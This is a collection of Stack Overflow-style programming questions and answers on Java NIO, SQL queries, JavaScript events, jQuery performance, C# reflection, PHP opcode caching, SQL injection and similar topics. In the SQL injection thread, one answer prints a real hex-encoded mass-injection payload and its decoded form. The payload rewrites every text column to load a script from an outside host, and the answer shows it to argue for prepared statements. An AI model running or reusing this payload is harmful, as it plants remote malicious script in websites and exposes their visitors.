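class ChunkedWriter {
    // Writes `data` to `path` through one small reusable buffer instead of
    // allocating a ByteBuffer large enough to hold everything at once.
    public static void write(String path, byte[] data, int chunkSize) throws IOException {
        ByteBuffer buffer = ByteBuffer.allocate(chunkSize);
        FileOutputStream out = new FileOutputStream(path);
        FileChannel channel = out.getChannel();
        try {
            int offset = 0;
            while (offset < data.length) {
                int len = Math.min(chunkSize, data.length - offset);
                buffer.clear();                  // reset position/limit for reuse
                buffer.put(data, offset, len);
                buffer.flip();                   // switch from filling to draining
                while (buffer.hasRemaining()) {  // a channel may write partially
                    channel.write(buffer);
                }
                offset += len;
            }
        } finally {
            channel.close();
            out.close();
        }
    }
}
```

Because the buffer is a fixed, small size regardless of how much data passes through it, memory use stays flat no matter how large the file gets.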
Check out Java's **[Mapped Byte Buffers](http://java.sun.com/j2se/1.4.2/docs/api/java/nio/MappedByteBuffer.html)**, also known as 'direct buffers'. Basically, this mechanism uses the OS's virtual memory paging system to 'map' your buffer directly to disk. The OS will manage moving the bytes to/from disk and memory auto-magically, very quickly, and you won't have to worry about changing your virtual machine options. This will also allow you to take advantage of NIO's improved performance over traditional java stream-based i/o, without any weird hacks. The only two catches that I can think of are: 1. On 32-bit system, you are limited to just under 4GB *total for all mapped byte buffers*. (That is actually a limit for my application, and I now run on 64-bit architectures.) 2. Implementation is JVM specific and not a requirement. I use Sun's JVM and there are no problems, but YMMV. Kirk Pepperdine (a somewhat famous Java performance guru) is involved with a website, www.JavaPerformanceTuning.com, that has some more MBB details: **[NIO Performance Tips](http://www.javaperformancetuning.com/tips/nio.shtml#REF1)**
How to avoid OutOfMemoryError when using Bytebuffers and NIO?
[ "", "java", "nio", "bytebuffer", "filechannel", "" ]
What is the simplest SQL query to find the second largest integer value in a specific column? There may be duplicate values in the column.
``` SELECT MAX( col ) FROM table WHERE col < ( SELECT MAX( col ) FROM table ) ```
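If you would rather avoid the subquery against MAX, most databases offer a dialect-specific alternative; these are sketches, so check your database's syntax:

```sql
-- MySQL / PostgreSQL: order the distinct values and skip the largest
SELECT DISTINCT col
FROM table
ORDER BY col DESC
LIMIT 1 OFFSET 1;

-- SQL Server 2005+ / Oracle: rank the values and keep the second rank
SELECT DISTINCT col
FROM ( SELECT col, DENSE_RANK() OVER (ORDER BY col DESC) AS rk
       FROM table ) ranked
WHERE rk = 2;
```

`DENSE_RANK` gives tied values the same rank, so duplicates of the largest value do not push the true second-largest value out of rank 2.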
``` SELECT MAX(col) FROM table WHERE col NOT IN ( SELECT MAX(col) FROM table ); ```
What is the simplest SQL Query to find the second largest value?
[ "", "sql", "puzzle", "" ]
I'm aware of things like `onchange`, `onmousedown` and `onmouseup` but is there a good reference somewhere that lists all of them complete with possibly a list of the elements that they cover?
W3Schools seems to have a good Javascript events reference: [HTML DOM Events](http://www.w3schools.com/jsref/dom_obj_event.asp)
Quirksmode has a nice [event-compatibility table](http://quirksmode.org/dom/events/index.html) and an [introduction](http://quirksmode.org/js/introevents.html).
Reference that lists available JavaScript events?
[ "", "javascript", "browser", "client-side", "" ]
I'm looking for any way that I can improve the selector performance of a jQuery call. Specifically things like this: Is `$("div.myclass")` faster than `$(".myclass")` I would think it might be, but I don't know if jQuery is smart enough to limit the search by tag name first, etc. Anyone have any ideas for how to formulate a jQuery selector string for best performance?
There is no doubt that **filtering by tag name first is much faster** than filtering by classname. This will be the case until all browsers implement getElementsByClassName natively, as is the case with getElementsByTagName.
In some cases, you can speed up a query by limiting its context. If you have an element reference, you can pass it as the second argument to limit the scope of the query: ``` $(".myclass", a_DOM_element); ``` should be faster than ``` $(".myclass"); ``` if you already have a\_DOM\_element and it's significantly smaller than the whole document.
Good ways to improve jQuery selector performance?
[ "", "javascript", "jquery", "performance", "css-selectors", "" ]
If I have a ``` <input id="uploadFile" type="file" /> ``` tag, and a submit button, how do I determine, in IE6 (and above) if a file has been selected by the user. In FF, I just do: ``` var selected = document.getElementById("uploadBox").files.length > 0; ``` But that doesn't work in IE.
This works in IE (and FF, I believe): ``` if(document.getElementById("uploadBox").value != "") { // you have a file } ```
``` var nme = document.getElementById("uploadFile"); if(nme.value.length < 4) { alert('Must Select any of your photo for upload!'); nme.focus(); return false; } ```
How to determine if user selected a file for file upload?
[ "", "javascript", "html", "upload", "" ]
I have an Interface called `IStep` that can do some computation (See "[Execution in the Kingdom of Nouns](http://steve-yegge.blogspot.com/2006/03/execution-in-kingdom-of-nouns.html)"). At runtime, I want to select the appropriate implementation by class name. ``` // use like this: IStep step = GetStep(sName); ```
Your question is very confusing... If you want to find types that implement IStep, then do this: ``` foreach (Type t in Assembly.GetCallingAssembly().GetTypes()) { if (!typeof(IStep).IsAssignableFrom(t)) continue; Console.WriteLine(t.FullName + " implements " + typeof(IStep).FullName); } ``` If you know already the name of the required type, just do this ``` IStep step = (IStep)Activator.CreateInstance(Type.GetType("MyNamespace.MyType")); ```
If the implementation has a parameterless constructor, you can do this using the System.Activator class. You will need to specify the assembly name in addition to the class name: ``` IStep step = System.Activator.CreateInstance(sAssemblyName, sClassName).Unwrap() as IStep; ``` <http://msdn.microsoft.com/en-us/library/system.activator.createinstance.aspx>
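Combining the two answers (scan the assembly, then use `Activator`), here is a hedged sketch of a `GetStep` implementation; it assumes `sName` is the simple class name and that the implementation has a parameterless constructor:

```csharp
using System;
using System.Reflection;

public static class StepFactory
{
    // Finds a type in the current assembly whose simple name matches `name`
    // and which implements IStep, then creates it via its parameterless
    // constructor. Throws if no matching concrete type is found.
    public static IStep GetStep(string name)
    {
        foreach (Type t in Assembly.GetExecutingAssembly().GetTypes())
        {
            if (t.Name == name && !t.IsAbstract && typeof(IStep).IsAssignableFrom(t))
            {
                return (IStep)Activator.CreateInstance(t);
            }
        }
        throw new ArgumentException("No IStep implementation named " + name);
    }
}
```

The `!t.IsAbstract` check also filters out the `IStep` interface itself, since interfaces report as abstract.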
How to find an implementation of a C# interface in the current assembly with a specific name?
[ "", "c#", "linq", "reflection", "linq-to-objects", "" ]
This error just started popping up all over our site. ***Permission denied to call method to Location.toString*** I'm seeing Google posts that suggest that this is related to Flash and our crossdomain.xml. What caused this to occur, and how do you fix it?
Are you using JavaScript to communicate between frames/iframes which point to different domains? This is not permitted by the JS "same origin/domain" security policy. I.e., if you have ``` <iframe name="foo" src="foo.com/script.js"> <iframe name="bar" src="bar.com/script.js"> ``` And the script on bar.com tries to access `window["foo"].Location.toString`, you will get this (or a similar) exception. Please also note that the same origin policy can also kick in if you have content from different subdomains. [Here](http://www.mozilla.org/projects/security/components/same-origin.html) you can find a short and to-the-point explanation of it with examples.
You may have come across [this posting](http://willperone.net/Code/as3error.php), but it appears that a flash security update changed the behaviour of the crossdomain.xml, requiring you to specify a security policy to allow arbitrary headers to be sent from a remote domain. The Adobe knowledge base article (also referenced in the original post) is [here](http://kb.adobe.com/selfservice/viewContent.do?externalId=kb403185&sliceId=2).
What does this javascript error mean? Permission denied to call method to Location.toString
[ "", "javascript", "flash", "" ]
I am trying to snoop on a log file that an application is writing to. I have successfully hooked createfile with the detours library from MSR, but createfile never seems to be called with file I am interested in snooping on. I have also tried hooking openfile with the same results. I am not an experienced Windows/C++ programmer, so my initial two thoughts were either that the application calls createfile before I hook the apis, or that there is some other API for creating files/obtaining handles for them.
You can use Sysinternal's [FileMon](http://technet.microsoft.com/en-us/sysinternals/bb896642.aspx). It is an excellent monitor that can tell you exactly which file-related system calls are being made and what are the parameters. I think that this approach is much easier than hooking API calls and much less intrusive.
Here's a link which might be of use: [Guerilla-Style File Monitoring with C# and C++](http://www.codingthewheel.com/archives/how-i-built-a-working-online-poker-bot-6) It is possible to create a file without touching CreateFile API but can I ask **what DLL injection method you're using**? If you're using something like Windows Hooks your DLL won't be installed until sometime after the target application initializes and you'll miss early calls to CreateFile. Whereas if you're using something like DetourCreateProcessWithDll your CreateFile hook can be installed prior to any of the application startup code running. In my experience 99.9% of created/opened files result in a call to CreateFile, including files opened through C and C++ libs, third-party libs, etc. Maybe there are some undocumented DDK functions which don't route through CreateFile, but for a typical log file, I doubt it.
Any Windows APIs to get file handles besides createfile and openfile?
[ "", "c++", "windows", "api", "logfile", "" ]
I need to set the height of every textbox on my form, some of which are nested within other controls. I thought I could do something like this: ``` private static IEnumerator<TextBox> FindTextBoxes(Control rootControl) { foreach (Control control in rootControl.Controls) { if (control.Controls.Count > 0) { // Recursively search for any TextBoxes within each child control foreach (TextBox textBox in FindTextBoxes(control)) { yield return textBox; } } TextBox textBox2 = control as TextBox; if (textBox2 != null) { yield return textBox2; } } } ``` Using it like this: ``` foreach(TextBox textBox in FindTextBoxes(this)) { textBox.Height = height; } ``` But of course the compiler spits its dummy, because *foreach* expects an **IEnumerable** rather than an **IEnumerator**. Is there a way to do this without having to create a separate class with a **GetEnumerator()** method?
As the compiler is telling you, you need to change your return type to IEnumerable. That is how the yield return syntax works.
Just to clarify ``` private static IEnumerator<TextBox> FindTextBoxes(Control rootControl) ``` Changes to ``` private static IEnumerable<TextBox> FindTextBoxes(Control rootControl) ``` That should be all :-)
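For completeness, a sketch of the whole method with the corrected signature; the `Controls.Count` guard from the question is dropped here, since recursing into an empty collection is harmless:

```csharp
private static IEnumerable<TextBox> FindTextBoxes(Control rootControl)
{
    foreach (Control control in rootControl.Controls)
    {
        // Recursively search for any TextBoxes within each child control
        foreach (TextBox nested in FindTextBoxes(control))
        {
            yield return nested;
        }

        TextBox textBox = control as TextBox;
        if (textBox != null)
        {
            yield return textBox;
        }
    }
}
```

This works with `foreach` because the compiler-generated iterator class behind `yield return` implements both `IEnumerable<TextBox>` and `IEnumerator<TextBox>`; declaring the more capable return type is all the call site needs.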
Can I have a method returning IEnumerator<T> and use it in a foreach loop?
[ "", "c#", "foreach", "ienumerable", "ienumerator", "" ]
Have you used VS.NET Architect Edition's Application and System diagrams to start designing a solution? If so, did you find it useful? Did the "automatic implementation" feature work ok?
I used to use it a lot. This designer worked well for stubbing out prototype projects, but ultimately I found myself wasting a lot of time moving the mouse around when I could be typing. It seemed like an awesome idea to be able to print out the class diagrams to show APIs to other developers while I was prototyping, but it proved quite limiting, and it looks awful on a non-color printer. Now I just use the text editor and some [AutoHotkey](http://www.autohotkey.com) macros to get everything done.
Yes, and no, it's not very useful in my opinion. It's not very stable, it's easy to get out of sync, and the "look how fast I generate this" advantage is virtually nil when compared to more mundane things such as code snippets. Then again, I am a total "Architect" luddite, so take this with a grain of salt.
VS.NET Application Diagrams
[ "", "c#", ".net", "visual-studio", "architecture", "diagram", "" ]
I have always thought that the .equals() method in Java should be overridden to be made specific to the class you have created. In other words, to test for equivalence of two different instances rather than two references to the same instance. However, I have encountered other programmers who seem to think that the default object behavior should be left alone and a new method created for testing equivalence of two objects of the same class. What are the arguments for and against overriding the equals method?
Overriding the equals method is necessary if you want to test equivalence in standard library classes (for example, ensuring a java.util.Set contains unique elements or using objects as keys in java.util.Map objects). Note, if you override equals, ensure you honour the API contract as described in the documentation. For example, ensure you also override [Object.hashCode](http://java.sun.com/j2se/1.3/docs/api/java/lang/Object.html): > If two objects are equal according to > the equals(Object) method, then > calling the hashCode method on each of > the two objects must produce the same > integer result. EDIT: I didn't post this as a complete answer on the subject, so I'll echo Fredrik Kalseth's statement that overriding equals works best for [immutable objects](http://en.wikipedia.org/wiki/Immutable_object). To quote the API for [Map](http://java.sun.com/j2se/1.4.2/docs/api/java/util/Map.html): > Note: great care must be exercised if > mutable objects are used as map keys. > The behavior of a map is not specified > if the value of an object is changed > in a manner that affects equals > comparisons while the object is a key > in the map.
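A minimal sketch of an `equals`/`hashCode` pair that honours that contract; the `Point` class here is invented for illustration:

```java
final class Point {
    private final int x;
    private final int y;

    public Point(int x, int y) {
        this.x = x;
        this.y = y;
    }

    @Override
    public boolean equals(Object o) {
        if (this == o) return true;                 // reflexive fast path
        if (!(o instanceof Point)) return false;    // also rejects null
        Point other = (Point) o;
        return x == other.x && y == other.y;
    }

    @Override
    public int hashCode() {
        return 31 * x + y;  // equal objects must produce equal hash codes
    }
}
```

Making the class final and its fields immutable sidesteps both the symmetry problems subclassing can introduce and the mutable-key hazard the Map documentation warns about.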
I would highly recommend picking up a copy of Effective Java and reading through item 7 obeying the [equals contract](http://java.sun.com/j2se/1.5.0/docs/api/java/lang/Object.html). You need to be careful if you are overriding equals for mutable objects, as many of the collections such as Maps and Sets use equals to determine equivalence, and mutating an object contained in a collection could lead to unexpected results. Brian Goetz also has a pretty good [overview of implementing equals and hashCode](http://www.ibm.com/developerworks/java/library/j-jtp05273.html).
Overriding the equals method vs creating a new method
[ "", "java", "oop", "" ]
What I have so far is ``` #!/bin/sh php_syntax_check() { retval=0 for i in $(git-diff-index --name-only --cached HEAD -- | grep -e '\.php$'); do if [ -f $i ]; then output=$(php -l $i) retval=$? if [ $retval -gt 0 ]; then echo "==============================================================================" echo "Unstaging $i for the commit due to the follow parse errors" echo "$output" git reset -q HEAD $i fi fi done if [ $retval -gt 0 ]; then exit $retval fi } php_syntax_check ```
If the commit is a partial commit (not all the changes in the working tree are committed), then this may give incorrect results, since it tests the working copy and not the staged copy. One way to do this could be: ``` git diff --cached --name-only --diff-filter=ACMR | xargs git checkout-index --prefix=$TMPDIR/ -- find $TMPDIR -name '*.php' -print | xargs -n 1 php -l ``` Which would make a copy of the staged images into a scratch space and then run the test command on them there. If any of the files include other files in the build then you may have to recreate the whole staged image in the test tree and then test the changed files there (See: [Git pre-commit hook : changed/added files](https://stackoverflow.com/questions/2412450/git-pre-commit-hook-changed-added-files/3068990#3068990)).
I'm sorry if it's offtopic, but aren't you supposed to run some kind of automated tests (which would imply that the code has no syntax errors) before doing a commit?
Is there a better way of writing a git pre-commit hook to check any php file in a commit for parse errors?
[ "", "php", "git", "version-control", "" ]
How can I set the background color of an HTML element using css in JavaScript?
In general, CSS properties are converted to JavaScript by making them camelCase without any dashes. So `background-color` becomes `backgroundColor`. ``` function setColor(element, color) { element.style.backgroundColor = color; } // where el is the concerned element var el = document.getElementById('elementId'); setColor(el, 'green'); ```
You might find your code is more maintainable if you keep all your styles, etc. in CSS and just set / unset class names in JavaScript. Your CSS would obviously be something like: ``` .highlight { background:#ff00aa; } ``` Then in JavaScript: ``` element.className = element.className === 'highlight' ? '' : 'highlight'; ```
How to set background color of HTML element using css properties in JavaScript
[ "", "javascript", "css", "background-color", "" ]
I'm trying to improve performance under high load and would like to implement opcode caching. Which of the following should I use? * APC - [Installation Guide](http://www.howtoforge.com/apc-php5-apache2-debian-etch) * eAccelerator - [Installation Guide](http://www.howtoforge.com/eaccelerator_php5_debian_etch) * XCache - [Installation Guide](http://www.howtoforge.com/xcache-php5-apache2-debian-etch) I'm also open to any other alternatives that have slipped under my radar. Currently running on a stock Debian Etch with Apache 2 and PHP 5.2 **[Update 1]** HowtoForge installation links added **[Update 2]** Based on the answers and feedback given, I have tested all 3 implementations using the following Apache JMeter test plan on my application: * Login * Access Home Page With 50 concurrent connections, the results are as follows: No Opcode Caching ![No Opcode Caching](https://i.stack.imgur.com/ueCBW.jpg) APC ![APC](https://i.stack.imgur.com/ggqC8.jpg) eAccelerator ![eAccelerator](https://i.stack.imgur.com/puxe5.jpg) XCache ![XCache](https://i.stack.imgur.com/GybYH.jpg) Performance Graph (smaller is better) ![Performance Graph](https://i.stack.imgur.com/oXTe9.png) From the above results, eAccelerator has a slight edge in performance compared to APC and XCache. However, what matters most from the above data is that any sort of opcode caching gives a tremendous boost in performance. I have decided to use APC due to the following 2 reasons: * Package is available in official Debian repository * More functional control panel To summarize my experience: Ease of Installation: APC > eAccelerator > XCache Performance: eAccelerator > APC, XCache Control Panel: APC > XCache > eAccelerator
I think the answer might depend on the type of web applications you are running. I had to make this decision myself two years ago and couldn't decide between Zend Optimizer and eAccelerator. In order to make my decision, I used ab (apache bench) to test the server, and tested the three combinations (zend, eaccelerator, both running) and proved that eAccelerator on its own gave the greatest performance. If you have the luxury of time, I would recommend doing similar tests yourself, and making the decision based on your results.
I have run several [benchmarks with eAcclerator, APC, XCache](http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/), and Zend Optimizer (even though Zend is an optimizer, not a cache). [Benchmark Results http://blogs.interdose.com/dominik/wp-content/uploads/2008/04/opcode\_wordpress.png](http://blogs.interdose.com/dominik/wp-content/uploads/2008/04/opcode_wordpress.png) Result: eAccelerator is fastest (in all tests), followed by XCache and APC. (The one in the diagram is the number of seconds to call a WordPress home page 10,000 times). Zend Optimizer made everything slower (!).
Which PHP opcode cacher should I use to improve performance?
[ "", "php", "performance", "caching", "" ]
I am working on a project right now that involves receiving a message from another application, formatting the contents of that message, and sending it to a printer. The technology of choice is C# windows service. The output could be called a report, I suppose, but a reporting engine is not necessary. A simple templating engine, like StringTemplate, or even XSLT outputting HTML would be fine. The problem I'm having is finding a free way to print this kind of output from a service. Since it *seems* that it will work, I'm working on a prototype using Microsoft's RDLC, populating a local report and then rendering it as an image to a memory stream, which I will then print. Issues with that are: * Multi-page printing will be a big headache. * Still have to use PrintDocument to print the memory stream, which is unsupported in a Windows Service (though it may work - haven't gotten that far with the prototype yet) * If the data coming across changes, I have to change the dataset and the class that the data is being deserialized into. bad bad bad. Has anyone had to do anything remotely like this? Any advice? I already posted a question about printing HTML without user input, and after wasting about 3 days on that, I have come to the conclusion that it cannot be done, at least not with any freely available tool. All help is appreciated. EDIT: We are on version 2.0 of the .NET framework.
Trust me, you will spend more money trying to search/develop a solution for this as compared to buying a third party component. Do not reinvent the wheel and go for the paid solution. Printing is a complex problem and I would love to see the day when better framework support is added for this.
Printing from a Windows service is really painful. It seems to work... sometimes... but finally it crashes or throws an exception from time to time, without any clear reason. It's really hopeless. Officially, it's even [not supported](http://msdn.microsoft.com/en-us/library/system.drawing.printing(VS.80).aspx), without any explanation, nor any proposal for an alternate solution. Recently, I was confronted with the problem, and after several unsuccessful trials and experiments I finally came up with two viable solutions: * Write your own printing DLL using the Win32 API (in C/C++ for instance), then use it from your service with P/Invoke (works fine) * Write your own printing COM+ component, then use it from your service. I chose this solution with success recently (but it was a third-party COM+ component, not one I wrote myself) It works absolutely fine too.
Printing from a .NET Service
[ "", "c#", ".net", "windows-services", "printing", "" ]
I'm using the .NETCF (Windows Mobile) `Graphics` class and the `DrawString()` method to render a single character to the screen. The problem is that I can't seem to get it centred properly. No matter what I set for the Y coordinate of the location of the string render, it always comes out lower than that and the larger the text size the greater the Y offset. For example, at text size 12, the offset is about 4, but at 32 the offset is about 10. I want the character to vertically take up most of the rectangle it's being drawn in and be centred horizontally. Here's my basic code. `this` is referencing the user control it's being drawn in. ``` Graphics g = this.CreateGraphics(); float padx = ((float)this.Size.Width) * (0.05F); float pady = ((float)this.Size.Height) * (0.05F); float width = ((float)this.Size.Width) - 2 * padx; float height = ((float)this.Size.Height) - 2 * pady; float emSize = height; g.DrawString(letter, new Font(FontFamily.GenericSansSerif, emSize, FontStyle.Regular), new SolidBrush(Color.Black), padx, pady); ``` Yes, I know there is the label control that I could use instead and set the centring with that, but I actually do need to do this manually with the `Graphics` class.
Through a combination of the suggestions I got, I came up with this: ``` private void DrawLetter() { Graphics g = this.CreateGraphics(); float width = ((float)this.ClientRectangle.Width); float height = ((float)this.ClientRectangle.Width); float emSize = height; Font font = new Font(FontFamily.GenericSansSerif, emSize, FontStyle.Regular); font = FindBestFitFont(g, letter.ToString(), font, this.ClientRectangle.Size); SizeF size = g.MeasureString(letter.ToString(), font); g.DrawString(letter, font, new SolidBrush(Color.Black), (width-size.Width)/2, 0); } private Font FindBestFitFont(Graphics g, String text, Font font, Size proposedSize) { // Compute actual size, shrink if needed while (true) { SizeF size = g.MeasureString(text, font); // It fits, back out if (size.Height <= proposedSize.Height && size.Width <= proposedSize.Width) { return font; } // Try a smaller font (90% of old size) Font oldFont = font; font = new Font(font.Name, (float)(font.Size * .9), font.Style); oldFont.Dispose(); } } ``` So far, this works flawlessly. The only thing I would change is to move the FindBestFitFont() call to the OnResize() event so that I'm not calling it every time I draw a letter. It only needs to be called when the control size changes. I just included it in the function for completeness.
I'd like to add another vote for the StringFormat object. You can use this simply to specify "center, center" and the text will be drawn centrally in the rectangle or points provided: ``` StringFormat format = new StringFormat(); format.LineAlignment = StringAlignment.Center; format.Alignment = StringAlignment.Center; ``` However there is one issue with this in CF. If you use Center for both values then it turns TextWrapping off. No idea why this happens, it appears to be a bug with the CF.
Center text output from Graphics.DrawString()
[ "", "c#", "graphics", "compact-framework", "" ]
I joined a new company about a month ago. The company is rather small in size and has pretty strong "start-up" feel to it. I'm working as a Java developer on a team of 3 others. The company primarily sells a service to for businesses/business-type people to use in communicating with each other. One of the main things I have been, and will be working on, is the main website for the company - from which the service is sold, existing users login to check their service and pay their bills, new users can sign up for a trial, etc. Currently this is a JSP application deployed on Tomcat, with access to a database done thru a persistence layer written by the company itself. A repeated and growing frustration I am having here (and I'm pretty happy with the job overall, so this isn't an "oh no I don't like my job"-type post) is the lack of any larger design or architecture for this web application. The app is made up of several dozen JSP pages, with almost no logic existing in Servlets or Beans or any other sort of framework. Many of the JSP pages are thousands of lines of code, they `jsp:include` other JSP pages, business logic is mixed in with the HTML, frequently used snippets of code (such as obtaining a web service connection) is cut and paste rather than reused, etc. In other words, the application is a mess. There have been some rumblings within the company of trying to re-architect this site so that it fits MVC better; I think that the developers and higher-ups are beginning to realize that this current pattern of spaghetti code isn't sustainable or very easily scalable to add more features for the users. The higher-ups and developers are wary of completely re-writing the thing (with good reason, since this would mean several weeks or months of work re-writing existing functionality), but we've had some discussions of (slowly) re-writing certain areas of the site into a new framework. 
What are some of the best strategies to enable moving the application and codebase into this direction? How can I as a developer really help move this along, and quickly, without seeming like the jerk-y new guy who comes into a job and tells everyone that what they've written is crap? Are there any proven strategies or experiences that you've used in your own job experience when you've encountered this sort of thing?
Your best bet is probably to refactor it slowly as you go along. Few of us have the resources that would be required to completely start from scratch with something that has so many business rules buried in it. Management really hates it when you spend months developing an app that has more bugs than the one you replaced. If you have the opportunity to build any separate apps from scratch, use all of the best practices there and use it to demonstrate how effective they are. When you can, incorporate those ideas gradually into the old application.
First pick up a copy of Michael Feathers's [Working Effectively with Legacy Code](https://rads.stackoverflow.com/amzn/click/com/0131177052). Then identify how best to test the existing code. The worst case is that you are stuck with just some high-level regression tests (or nothing at all); if you are lucky there will be unit tests. Then it is a case of slow, steady refactoring, hopefully while adding new business functionality at the same time.
What is the best way to migrate an existing messy webapp to elegant MVC?
[ "", "java", "model-view-controller", "jsp", "architecture", "" ]
Why does Visual Studio declare new classes as private in C#? I almost always switch them over to public, am I the crazy one?
Private access by default seems like a reasonable design choice on the part of the C# language specifiers. A good general design principle is to make all access levels as restrictive as possible, to minimize dependencies. You are less likely to end up with the wrong access level if you start as restrictive as possible and make the developer take some action to make a class or member more visible. If something is less public than you need, then that is apparent immediately when you get a compilation error, but it is not nearly as easy to spot something that is more visible than it should be.
I am not sure WHY it does that, but here's what you do in order to get Visual Studio to create the class as public by default: Go to "Program Files\Microsoft Visual Studio 9.0\Common7\IDE\ItemTemplates\CSharp\Code\1033", where you will find a file called Class.zip; inside the .zip file, open the file called Class.cs. The content of the file looks like this: ``` using System; using System.Collections.Generic; $if$ ($targetframeworkversion$ == 3.5)using System.Linq; $endif$using System.Text; namespace $rootnamespace$ { class $safeitemrootname$ { } } ``` All you need to do is add `public` before the class name. The outcome should look like this: ``` using System; using System.Collections.Generic; $if$ ($targetframeworkversion$ == 3.5)using System.Linq; $endif$using System.Text; namespace $rootnamespace$ { public class $safeitemrootname$ { } } ``` One last thing you need to do is flush all the templates Visual Studio is using, and make it reload them. The command for that is (it takes a while, so hold on): ``` devenv /installvstemplates ``` And that's it, no more private classes by default. Of course you can also add internal or whatever you want. [Source](http://www.dev102.com/2008/03/14/how-to-get-visual-studio-to-create-new-classes-public-by-default/)
VS.NET defaults to private class
[ "", "c#", "visual-studio", "" ]
I was looking at the API documentation for the STL vector, and noticed there was no method on the vector class that allowed the removal of an element with a certain value. This seems like a common operation, and it seems odd that there's no built-in way to do this.
`std::remove` does not actually erase elements from the container: it overwrites the elements that should not be removed at the beginning of the container, and returns the iterator pointing to the next element after them. This iterator can be passed to `container_type::erase` to do the actual removal of the extra elements that are now at the end of the container: ``` std::vector<int> vec; // .. put in some values .. int int_to_remove = n; vec.erase(std::remove(vec.begin(), vec.end(), int_to_remove), vec.end()); ```
If you want to remove ***an*** item, the following will be a bit more efficient. ``` std::vector<int> v; auto it = std::find(v.begin(), v.end(), 5); if(it != v.end()) v.erase(it); ``` or you may avoid overhead of moving the items if the order does not matter to you: ``` std::vector<int> v; auto it = std::find(v.begin(), v.end(), 5); if (it != v.end()) { using std::swap; // swap the one to be removed with the last element // and remove the item at the end of the container // to prevent moving all items after '5' by one swap(*it, v.back()); v.pop_back(); } ``` Which is what Jim's method of `std::vector::erase` + `std::remove` does under the hood.
How do I remove an item from a stl vector with a certain value?
[ "", "c++", "stl", "" ]
I want to get the MD5 Hash of a string value in SQL Server 2005. I do this with the following command: ``` SELECT HashBytes('MD5', 'HelloWorld') ``` However, this returns a VarBinary instead of a VarChar value. If I attempt to convert `0x68E109F0F40CA72A15E05CC22786F8E6` into a VarChar I get `há ðô§*à\Â'†øæ` instead of `68E109F0F40CA72A15E05CC22786F8E6`. Is there any SQL-based solution? **[Yes](https://stackoverflow.com/questions/2120/#2382)**
I have found the solution elsewhere: ``` SELECT SUBSTRING(master.dbo.fn_varbintohexstr(HashBytes('MD5', 'HelloWorld')), 3, 32) ```
``` SELECT CONVERT(NVARCHAR(32),HashBytes('MD5', 'Hello World'),2) ```
Convert HashBytes to VarChar
[ "", "sql", "sql-server", "" ]
I am a web-developer working in PHP. I have some limited experience with using Test Driven Development in C# desktop applications. In that case we used nUnit for the unit testing framework. I would like to start using TDD in new projects but I'm really not sure where to begin. What recommendations do you have for a PHP-based unit testing framework and what are some good resources for someone who is pretty new to the TDD concept?
I've used both PHPUnit & **[SimpleTest](http://simpletest.org/)** and I found **SimpleTest** to be easier to use. As far as TDD goes, I haven't had much luck with it in the purest sense. I think that's mainly a time/discipline issue on my part though. Adding tests after the fact has been somewhat useful, but one of my favorite things to do is to write SimpleTest tests that test for specific bugs that I have to fix. That makes it very easy to verify that things are actually fixed and stay fixed.
I highly recommend [Test-Driven Development by Kent Beck (ISBN-10: 0321146530)](https://rads.stackoverflow.com/amzn/click/com/0321146530). It wasn't written specifically for PHP, but the concepts are there and should be easily translatable to PHP.
Test Driven Development in PHP
[ "", "php", "unit-testing", "tdd", "" ]
Is there a Regular Expression that can detect SQL in a string? Does anyone have a sample of something that they have used before to share?
Don't do it. You're practically guaranteed to fail. Use `PreparedStatement` (or its equivalent) instead.
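To illustrate the point, here is roughly what parameter binding looks like using Python's built-in `sqlite3` module (the table and data are invented for the example; the same pattern applies to Java's `PreparedStatement` and its equivalents in other languages):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES ('alice')")

# The input is bound as a value, never spliced into the SQL text,
# so a classic injection payload cannot change the query structure.
payload = "alice' OR '1'='1"
hits = conn.execute(
    "SELECT name FROM users WHERE name = ?", (payload,)
).fetchall()

# A legitimate lookup goes through exactly the same code path.
legit = conn.execute(
    "SELECT name FROM users WHERE name = ?", ("alice",)
).fetchall()
```

The payload is simply treated as an (unmatched) name, so no detection heuristics are needed at all.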
Use stored procedures or prepared statements. How will you detect something like this? BTW **do NOT run this:** ``` DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415 245204054205641524348415228323535292C40432056415243 4841522832353529204445434C415245205461626C655 F437572736F7220435552534F5220464F522053454C45435420612E6 E616D652C622E6E616D652046524F4D207379736F626A65637473206 12C737973636F6C756D6E73206220574845524520612E69643D622E6 96420414E4420612E78747970653D27752720414E442028622E78747 970653D3939204F5220622E78747970653D3335204F5220622E78747 970653D323331204F5220622E78747970653D31363729204F50454E2 05461626C655F437572736F72204645544348204E4558542046524F4 D205461626C655F437572736F7220494E544F2040542C40432057484 94C4528404046455443485F5354415455533D302920424547494E204 55845432827555044415445205B272B40542B275D20534554205B272 B40432B275D3D525452494D28434F4E5645525428564152434841522 834303030292C5B272B40432B275D29292B27273C736372697074207 372633D687474703A2F2F7777772E63686B626E722E636F6D2F622E6 A733E3C2F7363726970743E27272729204645544348204E455854204 6524F4D205461626C655F437572736F7220494E544F2040542C40432 0454E4420434C4F5345205461626C655F437572736F72204445414C4 C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S); ``` Which translates to: ``` ( DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC( 'UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=chkbnr.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor ) ```
RegEx to Detect SQL Injection
[ "", "sql", "regex", "sql-injection", "" ]
I assume that you can't use a JavaScript code snippet to validate if the browser user has turned off JavaScript. So what can I use instead? Can someone offer a code sample? I'm looking to wrap an if/then statement around it. I often code in CFML, if that helps.
Are we talking about something like this: JavaScript: ``` <body> ... ... <script type="text/javascript"> <!-- document.write("Hello World!") //--> </script> <noscript>Your browser does not support JavaScript!</noscript> ... ... </body> ```
